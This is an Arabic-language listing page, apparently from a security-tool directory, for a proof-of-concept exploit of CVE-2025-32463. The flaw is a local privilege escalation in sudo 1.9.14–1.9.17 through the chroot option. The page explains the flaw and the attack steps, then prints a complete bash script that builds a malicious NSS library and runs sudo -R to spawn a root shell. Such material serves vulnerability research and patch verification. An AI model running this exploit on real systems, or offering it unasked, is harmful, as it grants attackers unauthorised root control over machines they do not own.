Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/mr-alperen/cve-2025-32463
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالأوراق والأبحاثالتعلم والتعليماستغلال الملفات الثنائية
GitHubmr-alperen/cve-2025-32463

CVE-2025-32463

استغلال إثبات المفهوم لـ CVE-2025-32463، وهو تصعيد امتيازات محلي في sudo 1.9.14-1.9.17 عبر سوء تكوين chroot وحقن مكتبة NSS خبيثة.

عرض المستودع
1منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

📌 CVE-2025-32463 — ثغرة تصعيد الصلاحيات المحلية في Sudo --chroot

ExploitDB ID: 52352


🧠 نظرة عامة

يوثّق هذا المستودع ثغرة حرجة من نوع تصعيد الصلاحيات المحلية (LPE) تؤثر على إصدارات Sudo 1.9.14 – 1.9.17.

تنبع الثغرة من التنفيذ الخاطئ لخيار sudo -R (--chroot)، ما يسمح للمهاجم بـتنفيذ أوامر بصلاحيات root حتى لو لم يكن مسموحًا له في ملف sudoers.

🔥 النتيجة: مستخدم غير مصرح له ← root shell


🧩 المكوّن المتأثر

  • البرنامج: sudo
  • الإصدارات المتأثرة:
    • 1.9.14
    • 1.9.15
    • 1.9.16
    • 1.9.17
  • CVE ID: CVE-2025-32463
  • المنصة: Linux (خاصةً الأنظمة التي تستخدم NSS)
  • النظام الذي تم اختباره: Kali Rolling 2025

⚙️ السبب التقني للثغرة

معامل --chroot (-R) في Sudo يمنح المستخدم صلاحية تنفيذ الأوامر داخل دليل root يحدده بنفسه.

لكن نتيجةً لتغيير أُدخل في sudo 1.9.14:

  • يتم استدعاء chroot() عبر الدليل الذي يحدده المستخدم
  • قبل التحقق الكامل من ملف sudoers

يؤدي هذا إلى جعل المهاجم يحمّل مكتبة NSS خبيثة (libnss_*.so) بصلاحيات root عبر ملف:

/etc/nsswitch.conf

مزوّر ينشئه بنفسه.


🧨 سيناريو الهجوم (ملخص)

  1. يتم إنشاء دليل مؤقت
  2. يتم تجهيز ملف nsswitch.conf مزوّر
  3. يتم تجميع مكتبة NSS مشتركة خبيثة
  4. يتم استدعاء sudo -R <dir> <command>
  5. يتم تحميل مكتبة NSS بصلاحيات root
  6. يتم الحصول على Root shell 🚀

🧪 إثبات المفهوم (PoC)

⚠️ استخدمه في البيئات التعليمية وبيئات الاختبار فقط

root@kitploit:~
#!/bin/bash
# sudo-chwoot.sh – PoC for CVE-2025-32463

set -e

STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"

cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor))
void woot(void) {
    setreuid(0,0);
    setregid(0,0);
    chdir("/");
    execl("/bin/bash","/bin/bash",NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc

gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

sudo -R woot woot
تنزيل الأداة